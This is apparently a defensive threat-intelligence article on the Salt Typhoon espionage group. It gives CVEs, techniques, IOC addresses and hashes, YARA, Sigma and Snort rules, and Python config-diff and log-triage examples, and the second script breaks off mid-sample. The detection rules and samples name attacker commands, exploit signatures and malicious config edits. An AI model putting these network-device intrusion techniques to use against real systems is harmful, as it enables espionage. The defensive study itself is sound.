Salt Typhoon Expands to Norway: China's Telecom Hackers Are Now a Global Threat
A Nation-State APT That Breached 9 US Carriers Is Operating in Allied Nations. Here's What Your Organization Needs to Know—and Do—Right Now.
Executive Summary: This Is Not Just Norway's Problem
On February 6, 2026, Norway's Police Security Service (PST) publicly confirmed what security professionals have feared: Salt Typhoon—the Chinese state-sponsored APT group that executed the worst telecom breach in US history—has expanded operations to target allied nations.
The head of PST, Norway's domestic security service, called it the country's "most serious security situation since World War II." But this isn't just a Nordic concern. It's a global alert.
Here's what you need to understand:
- Salt Typhoon has breached 200+ organizations across 80 countries, including 9 confirmed US telecommunications carriers
- They accessed CALEA wiretapping systems, giving Chinese intelligence visibility into who US law enforcement was surveilling
- PST says the Norwegian intrusions came through vulnerable network devices, the same class of edge equipment (Cisco IOS XE, Ivanti VPN, Palo Alto firewalls) exploited in the US campaign
- The FBI is offering a reward of up to $10 million for information on Salt Typhoon operators, among the largest it has ever offered for a cyber actor
- 25+ allied intelligence agencies have co-signed advisories on this threat
If your organization operates in telecommunications, energy, defense, maritime, or government services—or if you use Cisco, Ivanti, Fortinet, or Palo Alto edge devices—you are in the target zone.
This article provides everything security leaders need: threat actor profile, technical analysis, IOCs, YARA rules, Sigma rules, MITRE ATT&CK mappings, and role-specific recommendations. The threat is active. The time to act is now.
Salt Typhoon: Profile of a Nation-State Threat Actor
Origins and Attribution
Salt Typhoon is an advanced persistent threat (APT) group operated by China's Ministry of State Security (MSS). First publicly identified in 2021, the group has rapidly evolved into one of the most capable and prolific nation-state cyber espionage operations in the world.
The attribution to China's MSS is unusually certain. In January 2025, the US Treasury Department sanctioned Sichuan Juxinhe Network Technology Co., Ltd. for "direct involvement with Salt Typhoon." This was followed by DOJ indictments and an FBI "Most Wanted" designation for key operators.
Known Aliases:
| Organization | Tracking Name |
|---|---|
| Microsoft | Salt Typhoon |
| Trend Micro | Earth Estries |
| Kaspersky Lab | GhostEmperor |
| ESET | FamousSparrow |
| Mandiant | UNC2286 |
| CrowdStrike | OPERATOR PANDA |
| Recorded Future | RedMike |
Organizational Structure
Salt Typhoon operates with the resources and sophistication of a nation-state:
- Multiple operational teams targeting different regions and industries
- Separate C&C infrastructure teams managing different backdoors and implants
- Shared tooling obtained from a supplier common to several Chinese APT groups (notably SNAPPYBEE, also tracked as Deed RAT)
- Corporate front companies providing infrastructure and technical support
Chinese Contractors Named in US Sanctions and in CISA AA25-239A (Sichuan Juxinhe is the one sanctioned by Treasury; the other two are named in the advisory as suppliers to the MSS and PLA):
| Company | Role |
|---|---|
| Sichuan Juxinhe Network Technology (四川聚信和网络科技有限公司) | Infrastructure support, front company |
| Beijing Huanyu Tianqiong Information Technology (北京寰宇天穹信息技术有限公司) | Cyber products and services |
| Sichuan Zhixin Ruijie Network Technology (四川智信锐捷网络科技有限公司) | Network monitoring tools |
Indicted Operators
The DOJ has indicted and the FBI is actively seeking:
Yin Kecheng
- Role: Infrastructure operator, intrusion specialist
- Status: Indicted, Sanctioned, FBI Wanted
- Reward: $2,000,000
- Affiliation: Sichuan Juxinhe Network Technology
Zhou Shuai (alias "Coldface")
- Role: Strategic broker, data resale
- Status: Indicted, Sanctioned, FBI Wanted
- Reward: $2,000,000
- Affiliation: Shanghai Heiying Information Technology, i-SOON
Primary Motivation: Espionage and Pre-Positioning
Salt Typhoon's objectives are strategic, not financial:
- Intelligence Collection: Harvesting communications metadata, call records, and audio from high-value targets
- Counterintelligence: Understanding who US law enforcement is surveilling via CALEA system access
- Pre-positioning: Establishing persistent access for potential future disruption operations
- Technology Acquisition: Stealing proprietary technology and trade secrets
Former NSA analyst Terry Dunlap described Salt Typhoon as "a component of China's 100-year strategy"—a patient, systematic approach to intelligence gathering that prioritizes long-term access over quick wins.
The Norway Intrusion: What We Know
PST Disclosure: February 6, 2026
Norway's Police Security Service (Politiets sikkerhetstjeneste, PST) publicly attributed cyber intrusions to Salt Typhoon in their annual National Threat Assessment 2026. This marks the first public attribution of Salt Typhoon activity by a Nordic nation.
Key Statements from PST Director General Beate Gangås:
"Norway is facing its most serious security situation since World War II."
"Chinese intelligence services have strengthened their ability to operate in Norway, including through cyber operations and human intelligence collection."
"Salt Typhoon exploited vulnerable network devices in Norway to conduct espionage operations."
"China is systematically exploiting collaborative R&D projects."
What Was Targeted
While PST did not name specific victim organizations, the threat assessment and Norway's strategic profile indicate likely targets:
High-Value Norwegian Sectors:
| Sector | Strategic Value to China |
|---|---|
| Energy (Oil/Gas) | Norway is now the EU's largest supplier of natural gas; critical post-Russia energy source |
| Maritime/Shipping | Major global shipping industry; controls North Sea/Arctic routes |
| Telecommunications | Infrastructure for government/military communications |
| Defense Contractors | NATO's northern flank; US military presence; allied capabilities |
| Arctic Operations | Svalbard sovereignty; Polar Silk Road ambitions; resource access |
| Research Institutions | Technology transfer opportunities; academic partnerships |
Access Vector Confirmed: Network Devices
PST specifically stated that Salt Typhoon "exploited vulnerable network devices"—consistent with the group's established modus operandi:
- Cisco routers and switches (IOS XE vulnerabilities)
- VPN concentrators (Ivanti, Fortinet)
- Next-generation firewalls (Palo Alto PAN-OS)
- Edge security appliances (Sophos, Citrix)
This is not endpoint compromise. This is infrastructure-level intrusion—far more difficult to detect and far more devastating in impact.
Geopolitical Context
Norway's targeting follows a strategic pattern:
- Energy Leverage: Understanding European energy supply chains gives China economic intelligence and potential disruption capabilities
- Arctic Access: China's Polar Silk Road ambitions require intelligence on Arctic governance and resources
- NATO Intelligence: Norway hosts NATO exercises and US military installations; communications intelligence is invaluable
- Technology Acquisition: Norwegian subsea engineering and maritime technology are world-leading
- Allied Signal Intelligence: Compromising Norwegian networks provides insight into broader NATO operations
The timing is also significant: with European attention focused on Russia, Chinese intelligence operations can proceed with reduced scrutiny.
Global Campaign Scope: 200+ Organizations, 80 Countries
The Full Picture
Norway is not an isolated incident. Salt Typhoon has executed one of the most extensive cyber espionage campaigns ever documented:
Campaign Statistics:
| Metric | Value | Source |
|---|---|---|
| Countries affected | 80+ | FBI (Aug 2025) |
| Organizations breached | 200+ | FBI (Aug 2025) |
| US telecoms confirmed | 9 | White House (Dec 2024) |
| Users with metadata stolen | 1,000,000+ | NYT/WSJ (Dec 2024) |
| Allied agencies warning | 25+ | CISA AA25-239A |
| FBI bounty offered | $10,000,000 | FBI (Apr 2025) |
US Telecommunications: Ground Zero
The US telecom breaches represent the heart of Salt Typhoon's campaign. Senator Mark Warner, then chair of the Senate Intelligence Committee, called it "the worst telecom hack in our nation's history."
Confirmed US Victims:
- AT&T
- Verizon
- T-Mobile
- Lumen Technologies
- Windstream
- Spectrum (Charter Communications)
- Consolidated Communications
- Viasat
- (One carrier still unnamed)
What They Stole
Call Detail Records (CDRs):
- Date, time, and duration of calls
- Source and destination phone numbers
- Cell tower and location data
- Over 1 million users affected, concentrated in Washington D.C. metro area
VoIP and Network Configurations:
- Complete network architecture diagrams
- VPN configurations and credentials
- Authentication system details
CALEA Wiretap Systems:
This is the most damaging aspect. CALEA (Communications Assistance for Law Enforcement Act) systems are used by law enforcement and intelligence agencies for court-authorized surveillance. Access to these systems gave Salt Typhoon:
- Visibility into who US law enforcement was investigating
- Awareness of active surveillance operations
- Intelligence on FBI and DOJ investigative priorities
- Potential to monitor ongoing investigations in real-time
Deputy National Security Advisor Anne Neuberger confirmed a "large number" of directly accessed individuals were "government targets of interest."
High-Profile Targets:
- Staff of the Kamala Harris 2024 presidential campaign
- Donald Trump's personal communications
- JD Vance's personal communications
- Congressional committee email systems (disclosed Dec 2025)
Geographic Expansion Timeline
| Date | Milestone |
|---|---|
| 2019 | Salt Typhoon operations begin |
| 2023 | US telecom infiltration starts |
| Sep 2024 | First public reports of telecom compromise |
| Oct 2024 | CALEA system access confirmed |
| Nov 2024 | T-Mobile attempted intrusion disclosed |
| Dec 2024 | White House confirms 9 telecoms breached |
| Jan 2025 | Treasury sanctions Sichuan Juxinhe |
| Feb 2025 | Canadian telecom compromised via CVE-2023-20198 (disclosed by Canada's Cyber Centre and the FBI in Jun 2025) |
| Apr 2025 | FBI announces $10M bounty |
| Jun 2025 | Viasat identified as victim |
| Aug 2025 | CISA issues AA25-239A with 25 agency co-seal |
| Nov 2025 | Australian targets confirmed |
| Dec 2025 | Congressional email breach disclosed |
| Feb 2026 | Norwegian intrusions confirmed |
Confirmed Affected Countries
Beyond the United States, Salt Typhoon has confirmed victims in:
- North America: Canada
- Europe: Norway, United Kingdom, Netherlands, Germany, France
- Asia-Pacific: Australia
The 80-country figure suggests operations across every continent where China has strategic interests.
Technical Analysis: Vulnerabilities and TTPs
Vulnerability Exploitation Strategy
Salt Typhoon's approach is distinctive: they exploit known, patchable vulnerabilities in network edge devices—often months or years after patches are available.
This is not the work of operators who need to burn zero-days. It's the work of operators who know that most organizations fail to patch network infrastructure devices with the same urgency they apply to endpoints.
Exploited Vulnerabilities (CVEs)
| CVE | CVSS | Vendor | Product | Description | Patch Available |
|---|---|---|---|---|---|
| CVE-2024-3400 | 10.0 | Palo Alto Networks | PAN-OS GlobalProtect | Arbitrary file creation leading to RCE | Apr 2024 |
| CVE-2023-20198 | 10.0 | Cisco | IOS XE | Web UI authentication bypass | Oct 2023 |
| CVE-2023-48788 | 9.8 | Fortinet | FortiClientEMS | SQL Injection vulnerability | Mar 2024 |
| CVE-2022-3236 | 9.8 | Sophos | Firewall | Code injection vulnerability | Sep 2022 |
| CVE-2021-26855 | 9.8 | Microsoft | Exchange Server | ProxyLogon SSRF | Mar 2021 |
| CVE-2018-0171 | 9.8 | Cisco | IOS / IOS XE | Smart Install RCE | Mar 2018 |
| CVE-2024-21887 | 9.1 | Ivanti | Connect Secure | Command injection (chained) | Jan 2024 |
| CVE-2023-46805 | 8.2 | Ivanti | Connect Secure | Authentication bypass | Jan 2024 |
| CVE-2023-20273 | 7.2 | Cisco | IOS XE | Post-auth command injection | Oct 2023 |
| CVE-2025-5777 | 9.3 | Citrix | NetScaler ADC / Gateway | Unauthenticated out-of-bounds memory read ("CitrixBleed 2") | Jun 2025 |
Key Observation: The oldest vulnerability in this list (CVE-2018-0171) was patched in 2018, eight years before the Norway disclosure; the Sophos bug has had a fix since 2022. Salt Typhoon succeeds because organizations don't patch network infrastructure with the discipline they apply to endpoints.
Custom Malware Arsenal
Salt Typhoon deploys sophisticated custom malware designed for telecommunications and network device environments:
GhostSpider
- Multi-modular backdoor specifically designed for telecommunications targeting
- Modular architecture allows operators to load capabilities as needed
- Communicates over encrypted channels
- Resistant to traditional endpoint detection
Demodex
- Windows kernel-mode rootkit
- Provides persistent, stealthy access that survives reboots
- Extremely difficult to detect with standard tools
- Used for long-term persistence on Windows infrastructure
SnappyBee (Deed RAT)
- Modular backdoor shared among several Chinese APT groups
- Its use across groups indicates a common supplier within the MSS tooling ecosystem
- Widely reported by vendors, consistent with broad operational use
Masol RAT
- Linux backdoor targeting government networks
- Custom-built for persistent access to Unix/Linux infrastructure
- Minimal footprint, difficult to detect
Crowdoor
- Persistence backdoor with process injection capabilities
- Used as initial foothold before deploying more sophisticated tools
Infrastructure Exploitation Techniques
Salt Typhoon's techniques on network devices are particularly sophisticated:
Container-Based Persistence:
- Deploys malicious containers using Cisco Guest Shell on IOS XE/NX-OS devices
- Container activity is rarely monitored by security teams
- Provides Linux environment on network devices for running custom tools
- Commands to watch for: guestshell enable, guestshell run bash, guestshell disable, guestshell destroy
Living-off-the-Land:
- Uses native device capabilities for packet capture (SPAN/RSPAN/ERSPAN)
- Leverages built-in SNMP capabilities for reconnaissance
- Exploits legitimate management protocols (SSH, HTTPS) for C2
GRE/IPsec Tunneling:
- Creates GRE and IPsec tunnels from compromised devices to actor-controlled C2 infrastructure
- Uses mGRE for multi-point connectivity
- Tunnels blend with legitimate VPN traffic
TACACS+ Credential Harvesting:
- Captures authentication packets on network devices
- Obtains credentials for network management systems
- Enables lateral movement to additional infrastructure
ACL Manipulation:
- Modifies Access Control Lists to whitelist attacker IP addresses
- Preserves access even if initial vulnerability is patched
- Difficult to detect without configuration baseline comparisons
SSH Evasion Techniques
Salt Typhoon uses non-standard SSH port patterns to evade detection:
- Ports matching the pattern 22x22 (e.g., 22022, 22122)
- Ports ending in 22 (e.g., 55022)
- High-numbered HTTPS ports (18xxx range)
- Cisco IOS XR sshd_operns on TCP/57722
MITRE ATT&CK Mapping
Understanding Salt Typhoon's techniques through the MITRE ATT&CK framework enables defenders to systematically address coverage gaps.
Initial Access
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1190 | Exploit Public-Facing Application | Primary method; exploits VPNs, firewalls, routers via N-day vulnerabilities |
| T1199 | Trusted Relationship | Pivots through provider-to-provider interconnections; abuses carrier peering relationships |
Execution
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1059.008 | Command and Scripting Interpreter: Network Device CLI | Executes commands via SNMP, SSH, HTTP POST on network devices |
Persistence
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1098.004 | Account Manipulation: SSH Authorized Keys | Injects SSH keys for persistent access |
| T1136.001 | Create Account: Local Account | Creates local admin accounts on network devices |
| T1543.003 | Create or Modify System Process: Windows Service | Creates Windows services for persistence |
| T1543.005 | Container Service | Deploys persistent containers on Cisco IOS XE |
Privilege Escalation
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1068 | Exploitation for Privilege Escalation | Post-authentication command injection (CVE-2023-20273) |
Defense Evasion
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1027 | Obfuscated Files or Information | Multi-layer XOR and Base64 encoding |
| T1027.010 | Command Obfuscation | Encodes commands to avoid detection |
| T1562.004 | Impair Defenses: Disable or Modify System Firewall | Modifies ACLs to whitelist attacker IPs |
| T1070.009 | Indicator Removal: Clear Persistence | Destroys containers after use |
| T1610 | Deploy Container | Uses containerization for evasion and persistence |
Credential Access
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1003 | OS Credential Dumping | Extracts NTDS.dit, captures TACACS+ packets |
| T1110.002 | Brute Force: Password Cracking | Cracks captured authentication hashes |
| T1556 | Modify Authentication Process | Modifies authentication on network devices |
Discovery
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1016 | System Network Configuration Discovery | Maps network topology from device configs |
| T1082 | System Information Discovery | Enumerates device versions, capabilities |
| T1595 | Active Scanning | Scans for additional vulnerable devices |
Lateral Movement
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1021.004 | Remote Services: SSH | SSH on non-standard ports (22x22 pattern) |
| T1199 | Trusted Relationship | Moves through carrier interconnections |
Collection
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1005 | Data from Local System | Collects configs, credentials, databases |
| T1040 | Network Sniffing | Uses native PCAP on routers/switches |
| T1560 | Archive Collected Data | Compresses data before exfiltration |
| T1602.001 | Data from Configuration Repository: SNMP (MIB Dump) | Retrieves configs via SNMP |
| T1602.002 | Data from Configuration Repository: Network Device Configuration Dump | Exports running-config files |
Command and Control
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1071 | Application Layer Protocol | HTTP/HTTPS for C2 communications |
| T1090.003 | Proxy: Multi-hop Proxy | Uses STOWAWAY for chained relays |
| T1572 | Protocol Tunneling | GRE, mGRE, IPsec tunnels to actor-controlled infrastructure |
Exfiltration
| Technique ID | Technique Name | Salt Typhoon Usage |
|---|---|---|
| T1041 | Exfiltration Over C2 Channel | Exfils via established tunnels |
| T1048.003 | Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol | Uses FTP/TFTP and other non-C2 protocols, often on non-standard ports |
Detection and Defense
Detection Strategy Overview
Salt Typhoon's focus on network infrastructure requires a different detection approach than traditional endpoint-focused security. Most organizations have robust endpoint detection but minimal visibility into router, switch, and firewall activity.
Key Detection Principles:
- Configuration monitoring is essential—you cannot detect what you don't baseline
- Network device logs must be collected and analyzed
- Container and virtualization activity on network devices is rarely monitored—fix this
- Unusual traffic patterns on management interfaces indicate compromise
Indicators of Compromise (IOCs)
High-Confidence IP Addresses:
45.61.134.134
45.61.133.157
45.61.128.29
45.61.132.125
104.194.153.181
104.194.129.137
104.194.147.15
167.88.173.252
172.86.101.123
172.86.106.234
193.239.86.132
85.195.89.94
89.117.1.147
91.231.186.227
103.169.91.231
103.199.17.238
103.253.40.199
1.222.84.29
Malware Hashes (SHA256):
| Filename | SHA256 | Description |
|---|---|---|
| cmd3 | 8b448f47e36909f3a921b4ff803cf3a61985d8a10f0fe594b405b92ed0fc21f1 | SFTP exfil client |
| cmd1 | f2bbba1ea0f34b262f158ff31e00d39d89bbc471d04e8fca60a034cabe18e4f4 | SFTP + PCAP collection |
| new2 | da692ea0b7f24e31696f8b4fe8a130dbbe3c7c15cea6bde24cccc1fb0a73ae9e | SFTP client variant |
| sft | a1abc3d11c16ae83b9a7cf62ebe6d144dfc5e19b579a99bad062a9d31cf30bfe | SFTP client variant |
Host-Based Indicators:
| Indicator Type | Values to Watch |
|---|---|
| PCAP capture names | mycap, mycap.pcap, tac.pcap, 1.pcap |
| Suspicious ACL names | access-list 10, access-list 20, access-list 50 |
| SSH port patterns | Ports matching 22x22 or ending in 22 |
| HTTPS high ports | Ports in 18xxx range |
| TACACS+ connections | TCP/49 to unapproved servers |
| IOS XR SSH | TCP/57722 (sshd_operns) |
YARA Rules
Salt Typhoon CMD1 SFTP Client Detection:
```yara
rule SALT_TYPHOON_CMD1_SFTP_CLIENT {
    meta:
        description = "Detects the Salt Typhoon Cmd1 SFTP client used for data exfiltration"
        author = "CISA"
        reference = "AA25-239A"
        date = "2025-08-27"
        threat_level = "critical"
    strings:
        $s1 = "monitor capture CAP"
        $s2 = "export ftp://%s:%s@%s%s"
        $s3 = "main.CapExport"
        $s4 = "main.SftpDownload"
        $s5 = ".(*SSHClient).CommandShell"
        $aes = "aes.decryptBlockGo"
        $buildpath = "C:/work/sync_v1/cmd/cmd1/main.go"
    condition:
        // ELF or PE header, then at least 5 of the 7 strings
        (uint32(0) == 0x464c457f or (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550))
        and 5 of them
}
```
GhostSpider Backdoor Detection:
```yara
rule SALT_TYPHOON_GHOSTSPIDER {
    meta:
        description = "Detects GhostSpider modular backdoor"
        author = "Trend Micro"
        date = "2024-11-25"
    strings:
        $str1 = "GhostSpider" ascii wide
        $str2 = "SNAPPYBEE" ascii wide
        $mod1 = "InitializeModule" ascii
        $mod2 = "ExecutePayload" ascii
        // Generic MSVC x64 function prologue (mov [rsp+x],rbx / rbp / rsi; push rdi; sub rsp,x).
        // It matches most 64-bit Windows binaries and only confirms native x64 code, so it
        // must never be the sole condition; the string hits carry the detection.
        $enc1 = { 48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 74 24 ?? 57 48 83 EC ?? }
    condition:
        uint16(0) == 0x5A4D and
        (2 of ($str*) or all of ($mod*)) and
        $enc1
}
```
Sigma Rules
Suspicious Guest Shell Activity on Cisco Devices:
```yaml
title: Salt Typhoon Guest Shell Container Activity
id: a1b2c3d4-e5f6-7890-abcd-ef1234567890
status: experimental
description: Detects Guest Shell commands associated with Salt Typhoon container persistence in Cisco command accounting
author: Breached.Company
date: 2026-02-08
references:
  - https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a
logsource:
  product: cisco
  service: aaa
detection:
  keywords_guestshell:
    - 'guestshell enable'
    - 'guestshell run bash'
    - 'guestshell destroy'
  keywords_helper:
    - 'chvrf'
    - 'dohost'
  condition: keywords_guestshell or keywords_helper
falsepositives:
  - Legitimate Guest Shell usage by network administrators
  - Automated provisioning systems
level: high
tags:
  - attack.persistence
  - attack.t1610
  - attack.t1543.005
```
Non-Standard SSH Port Detection:
```yaml
title: Salt Typhoon Non-Standard SSH Port Pattern
id: b2c3d4e5-f6a7-8901-bcde-f23456789012
status: experimental
description: Detects allowed connections to external destinations on ports matching Salt Typhoon SSH patterns (22x22, four- or five-digit ports ending in 22, 57722, 18xxx)
author: Breached.Company
date: 2026-02-08
logsource:
  category: firewall
detection:
  selection_ssh_pattern:
    dst_port|re: '^(22[0-9]22|[0-9]{2,3}22|57722|18[0-9]{3})$'
    action: 'allow'
  filter_internal_destination:
    dst_ip|cidr:
      - '10.0.0.0/8'
      - '172.16.0.0/12'
      - '192.168.0.0/16'
  condition: selection_ssh_pattern and not filter_internal_destination
falsepositives:
  - Custom SSH configurations and non-standard management ports; baseline before alerting
  - The rule matches on port alone, so confirm the protocol is SSH (banner or application ID) before escalating
level: medium
tags:
  - attack.command_and_control
  - attack.t1021.004
```
Unauthorized TACACS+ Connection:
```yaml
title: TACACS+ Connection to Unauthorized Server
id: c3d4e5f6-a7b8-9012-cdef-345678901234
status: experimental
description: Detects TACACS+ (TCP/49) connections to non-approved servers
author: Breached.Company
date: 2026-02-08
logsource:
  category: firewall
detection:
  selection:
    dst_port: 49
  filter_approved:
    dst_ip:
      - '<APPROVED_TACACS_SERVER_1>'
      - '<APPROVED_TACACS_SERVER_2>'
  condition: selection and not filter_approved
falsepositives:
  - New TACACS+ servers not yet added to allow list
level: high
tags:
  - attack.credential_access
  - attack.t1556
```
GRE Tunnel to Suspicious Destination:
```yaml
title: GRE/IPsec Tunnel to External Destination
id: d4e5f6a7-b8c9-0123-def0-456789012345
status: experimental
description: Detects a tunnel destination configured on a Cisco device that points outside RFC 1918 space (the "tunnel destination" line is the decisive one; "tunnel mode gre", "tunnel mode gre multipoint" and "tunnel mode ipsec" lines carry no destination)
author: Breached.Company
date: 2026-02-08
logsource:
  product: cisco
  service: syslog
detection:
  selection:
    Message|contains: 'tunnel destination'
  filter_internal:
    Message|re: 'tunnel destination (10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.)'
  condition: selection and not filter_internal
falsepositives:
  - Legitimate WAN tunnels
  - SD-WAN configurations
level: high
tags:
  - attack.command_and_control
  - attack.t1572
```
Snort Rules
CVE-2023-20198 Exploit Detection:
```
# Snort 2 syntax: a pcre selects the URI buffer with the U flag inside the pattern;
# a trailing http_uri keyword after a pcre is not valid.
alert tcp any any -> any $HTTP_PORTS (
    msg:"SALT TYPHOON - Potential CVE-2023-20198 Cisco IOS XE Exploit";
    flow:to_server,established;
    content:"POST"; http_method;
    pcre:"/(webui_wsma|%2577ebui_wsma|%2577eb%2575i_%2577sma)/iU";
    content:"<request xmlns=\"urn:cisco:wsma-config\""; http_client_body;
    content:"username"; http_client_body;
    content:"privilege 15"; http_client_body;
    classtype:web-application-attack;
    sid:2026020801;
    rev:1;
)
```
Ivanti Connect Secure Exploit Detection:
```
alert tcp any any -> any $HTTP_PORTS (
    msg:"SALT TYPHOON - Potential CVE-2024-21887 Ivanti Exploit Attempt";
    flow:to_server,established;
    content:"POST"; http_method;
    content:"/api/v1/totp/user-backup-code"; http_uri;
    content:"|3B|"; http_client_body;
    classtype:web-application-attack;
    sid:2026020802;
    rev:1;
)
```
Critical Detection Priorities
Priority 1: Configuration Baseline and Monitoring
- Pull all network device configurations immediately
- Hash and store for baseline comparison
- Compare against authorized change requests
- Alert on any unauthorized modifications
- Pay special attention to:
- ACL additions/modifications
- New local accounts
- SSH key changes
- Routing table modifications
- SNMP community string changes
- TACACS+/RADIUS server changes
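The Priority 1 procedure, and the ACL Manipulation point in the technical analysis, as an added example that is not part of the original article and not CISA or Cisco tooling: a Python script that hashes a stored baseline and the current running-config, diffs them, and reports only the change classes listed above (ACL entries, local accounts, SSH port or key changes, TACACS+/RADIUS servers, tunnel interfaces, packet captures, SNMP, routing). Both configurations are constructed IOS-style samples; the hostname, the svc_backup account and every address (RFC 1918 and RFC 5737) are invented for the illustration. The attacker-added permit line in ACL 20 is exactly the kind of change that survives a patch and that only a baseline comparison catches.

```python
"""Baseline-vs-running configuration diff for a Cisco IOS-style device.
Added example for this article (not CISA, Cisco or vendor code). Both configs
are constructed samples; hostname, svc_backup and all addresses are invented."""
import difflib
import hashlib
import re

# Constructed baseline: what the last approved change request says the device runs.
BASELINE = """\
hostname edge-rtr-01
username netops privilege 15 secret 9 $9$placeholder
ip ssh version 2
access-list 20 permit 10.0.5.0 0.0.0.255
tacacs server tac-01
 address ipv4 10.0.9.10
interface GigabitEthernet0/0/0
 ip address 203.0.113.2 255.255.255.252
"""

# Constructed running-config: the same device after an intrusion-style edit
# (new privilege-15 account, SSH moved to 22022, attacker host added to ACL 20,
# rogue TACACS+ server, GRE tunnel to an external host, packet capture armed).
RUNNING = """\
hostname edge-rtr-01
username netops privilege 15 secret 9 $9$placeholder
username svc_backup privilege 15 secret 9 $9$attacker
ip ssh version 2
ip ssh port 22022 rotary 1
access-list 20 permit 10.0.5.0 0.0.0.255
access-list 20 permit host 198.51.100.77
tacacs server tac-01
 address ipv4 10.0.9.10
tacacs server tac-02
 address ipv4 198.51.100.78
interface GigabitEthernet0/0/0
 ip address 203.0.113.2 255.255.255.252
interface Tunnel100
 tunnel mode gre ip
 tunnel destination 198.51.100.79
monitor capture mycap interface GigabitEthernet0/0/0 both
"""

# Change classes worth paging on; matched after stripping indentation so that
# sub-commands such as "tunnel destination" are classified too.
SENSITIVE = {
    "acl_change": re.compile(r"^(ip |ipv6 )?access-list\b"),
    "local_account": re.compile(r"^username\b"),
    "ssh_key_or_port": re.compile(r"^(ip ssh port|ip ssh pubkey-chain|key-string)\b"),
    "aaa_server": re.compile(r"^(tacacs server|radius server|tacacs-server host|radius-server host)\b"),
    "tunnel": re.compile(r"^(interface Tunnel\d|tunnel (mode|destination|source)\b)"),
    "packet_capture": re.compile(r"^monitor capture\b"),
    "snmp": re.compile(r"^snmp-server (community|user|host)\b"),
    "routing": re.compile(r"^(ip route\b|router )"),
}


def config_hash(text: str) -> str:
    """SHA-256 of the stored text: the cheap first check before a full diff."""
    return hashlib.sha256(text.encode()).hexdigest()


def classify(line: str):
    """Return the sensitive class a config line belongs to, or None."""
    stripped = line.lstrip()
    for name, pattern in SENSITIVE.items():
        if pattern.match(stripped):
            return name
    return None


def diff_config(baseline: str, running: str):
    """Return (added, removed): (class, line) pairs for sensitive lines that differ.
    n=0 suppresses context lines, so only genuine additions and removals are seen."""
    added, removed = [], []
    for d in difflib.unified_diff(baseline.splitlines(), running.splitlines(), lineterm="", n=0):
        if d.startswith(("+++", "---", "@@")):
            continue
        cls = classify(d[1:])
        if cls is None:
            continue
        (added if d[0] == "+" else removed).append((cls, d[1:].strip()))
    return added, removed


def report(baseline: str, running: str) -> dict:
    """Hash both configs and group the sensitive differences by class."""
    added, removed = diff_config(baseline, running)
    by_class = {}
    for cls, line in added:
        by_class.setdefault(cls, []).append("+ " + line)
    for cls, line in removed:
        by_class.setdefault(cls, []).append("- " + line)
    return {
        "baseline_sha256": config_hash(baseline),
        "running_sha256": config_hash(running),
        "changed": config_hash(baseline) != config_hash(running),
        "by_class": by_class,
    }


if __name__ == "__main__":
    result = report(BASELINE, RUNNING)
    print("config changed:", result["changed"])
    for cls, lines in result["by_class"].items():
        print(f"[{cls}]")
        for line in lines:
            print("   ", line)
```

Run it against configs pulled over your out-of-band path (never through the management plane you suspect) and feed the by_class output into the change-request comparison; anything in acl_change, local_account, aaa_server or tunnel that has no ticket is an incident, not a drift finding.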
Priority 2: Guest Shell / Container Monitoring
- Audit Guest Shell status on all Cisco IOS XE and NX-OS devices
- Document authorized container use cases
- Alert on unexpected Guest Shell enable/disable events
- Monitor for chvrf and dohost commands
- Check for persistent containers that shouldn't exist
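Priority 2 as an added example, not the article's own code and not a Cisco or CISA tool: Python that reads constructed syslog and TACACS+ command-accounting lines, extracts the executed command, classifies it against the Guest Shell, capture, tunnel and ACL indicators described above, and then correlates a Guest Shell enable followed by a destroy from the same user on the same device, which is the "destroys containers after use" pattern in the ATT&CK mapping. The first sample lines imitate IOS XE %PARSER-5-CFGLOG_LOGGEDCMD config-logger messages and the rest imitate tac_plus shell-command accounting records (space-separated here; real tac_plus logs are tab-separated). Devices, users and addresses are invented, and the two parsing regexes are the part to adapt to your AAA server's actual field layout.

```python
"""Command-accounting triage for Guest Shell, capture and tunnel activity.
Added example for this article (not Cisco or CISA code). SAMPLE_LOGS is
constructed: IOS XE config-logger style lines followed by tac_plus-style
shell accounting records. Devices, users and addresses are invented."""
import re
from collections import defaultdict

SAMPLE_LOGS = """\
<189>Feb  8 10:12:01 edge-rtr-01 123: %SYS-5-CONFIG_I: Configured from console by netops on vty0 (10.0.9.50)
<189>Feb  8 10:12:03 edge-rtr-01 124: %PARSER-5-CFGLOG_LOGGEDCMD: User:netops  logged command:ip access-list standard 20
<189>Feb  8 10:13:40 edge-rtr-01 125: %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup  logged command:interface Tunnel100
<189>Feb  8 10:13:41 edge-rtr-01 126: %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup  logged command:tunnel mode gre ip
<189>Feb  8 10:13:42 edge-rtr-01 127: %PARSER-5-CFGLOG_LOGGEDCMD: User:svc_backup  logged command:tunnel destination 198.51.100.79
Feb  8 10:15:02 tac-01 tac_plus[2201]: 10.0.9.1 svc_backup vty1 10.0.9.50 stop task_id=77 service=shell priv-lvl=15 cmd=guestshell enable <cr>
Feb  8 10:15:30 tac-01 tac_plus[2201]: 10.0.9.1 svc_backup vty1 10.0.9.50 stop task_id=78 service=shell priv-lvl=15 cmd=guestshell run bash <cr>
Feb  8 10:16:05 tac-01 tac_plus[2201]: 10.0.9.1 svc_backup vty1 10.0.9.50 stop task_id=79 service=shell priv-lvl=15 cmd=monitor capture mycap interface GigabitEthernet0/0/0 both <cr>
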